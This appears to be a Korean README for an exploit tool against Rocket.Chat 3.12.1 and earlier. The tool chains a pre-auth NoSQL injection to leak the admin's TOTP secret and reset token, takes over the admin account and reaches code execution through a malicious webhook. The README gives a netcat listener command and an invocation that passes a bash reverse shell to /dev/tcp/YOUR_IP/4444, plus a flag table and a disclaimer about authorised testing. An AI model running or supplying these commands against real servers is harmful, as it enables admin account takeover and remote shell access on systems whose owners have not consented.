
Rocket.Chat 3.12.1의 사전 인증(pre-auth) NoSQL 인젝션 취약점을 악용하여 관리자의 TOTP 비밀키와 비밀번호 재설정 토큰을 유출하고, 관리자 계정을 탈취한 뒤 악성 웹훅 통합을 통해 RCE를 달성합니다.
Rocket.Chat <= 3.12.1
pip install -r requirements.txt
익스플로잇을 실행하기 전에, 별도의 터미널에서 netcat 리스너를 시작하여 들어오는 리버스 셸을 받으세요:
nc -lvnp 4444
이 터미널을 열어 두세요. 익스플로잇이 성공적으로 실행되면 셸이 여기에 표시됩니다.
python3 pwn_rocketchat.py \
-t 'http://TARGET:3000' \
-u 'USERNAME' \
-p 'PASSWORD' \
-e '[email protected]' \
-a 'adminusername' \
-c '/bin/bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'
이 도구는 교육 목적 및 공인된 침투 테스트용으로만 제작되었습니다. 작성자는 이 도구의 오용 또는 이로 인해 발생한 피해에 대해 책임을 지지 않습니다. 테스트를 수행하기 전에 항상 적절한 서면 승인을 받으십시오.
| 플래그 | 설명 |
|---|
-t | 대상 Rocket.Chat URL |
-u | 등록된 낮은 권한(low-priv) 사용자 이름 |
-p | 등록된 낮은 권한(low-priv) 비밀번호 |
-e | 관리자 이메일 주소 |
-a | 관리자 사용자 이름 |
-c | 리버스 셸 명령 |
-v | 상세(verbose) 모드 (원시 응답 표시) |